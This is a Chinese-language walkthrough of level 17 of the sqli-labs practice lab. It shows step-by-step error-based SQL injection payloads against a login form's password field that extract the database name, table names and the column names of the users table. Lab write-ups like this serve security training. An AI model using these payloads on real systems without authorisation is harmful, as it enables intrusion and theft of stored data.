sqli-labs第十七关——POST注入点

一：判断注入点

uname=1'&passwd=123
uname=1')&passwd=123
uname=1“)&passwd=123
uname=1”&passwd=123
uname=1&passwd=123

测试四个代码，页面均无反应 

所以我们更换注入点的位置 ，再密码框注入

uname=admin&passwd=1
uname=admin&passwd=1'*****
uname=admin&passwd=1"
uname=admin&passwd=1')
uname=admin&passwd=1")

第二行成功得到不同的回显，得出结论：注入点在密码栏， 是单引号字符型

尝试闭合：

uname=admin&passwd=1' or 1#

闭合成功 

二：开始注入

1.爆数据库

order by用不了，联合注入用不了，尝试报错注入

uname=admin&passwd=1' and extractvalue(1,concat(0x7e,database()))#

 得到库名字security

2.爆表名

uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))#

 

3.爆列名

uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')))#

❀❀❀ 完结撒花！！！❀❀❀